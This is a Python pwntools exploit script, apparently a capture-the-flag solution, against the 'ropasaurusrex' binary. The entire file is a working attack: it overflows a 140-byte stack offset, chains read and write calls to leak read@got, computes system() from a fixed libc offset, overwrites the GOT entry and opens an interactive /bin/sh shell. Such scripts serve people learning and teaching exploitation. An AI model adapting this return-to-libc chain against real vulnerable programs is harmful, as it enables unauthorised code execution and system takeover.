```python
from pwn import *

p = process('./ropasaurusrex')
e = ELF('./ropasaurusrex')

# pop; pop; pop; ret gadget: cleans the three arguments off the stack after each call
pppr = 0x080484b6
# context(arch='i386', os='linux', endian='little', log_level='debug')

# 136-byte stack buffer + saved ebp: the saved return address sits at offset 140
payload = b"A" * 140
# distance between read() and system() in the target's libc (read - system)
offset = 0x9ad60

# 1) read(0, .bss, 8): store "/bin/sh\0" in .bss
payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.bss())
payload += p32(len(b"/bin/sh\x00"))
# 2) write(1, read@got, 4): leak the resolved libc address of read()
payload += p32(e.plt['write'])
payload += p32(pppr)
payload += p32(1)
payload += p32(e.got['read'])
payload += p32(4)
# 3) read(0, read@got, 4): overwrite read's GOT entry with the computed system() address
payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.got['read'])
payload += p32(4)
# 4) read@plt now jumps to system(); call it with the .bss string as its argument
payload += p32(e.plt['read'])
payload += b"AAAA"           # dummy return address for system()
payload += p32(e.bss())

p.send(payload)
p.send(b"/bin/sh\x00")       # consumed by read #1

read = u32(p.recv(4))        # 4 bytes leaked by write #2
print(hex(read))
system = read - offset
print(hex(system))
p.send(p32(system))          # consumed by read #3, lands in read@got
p.interactive()
```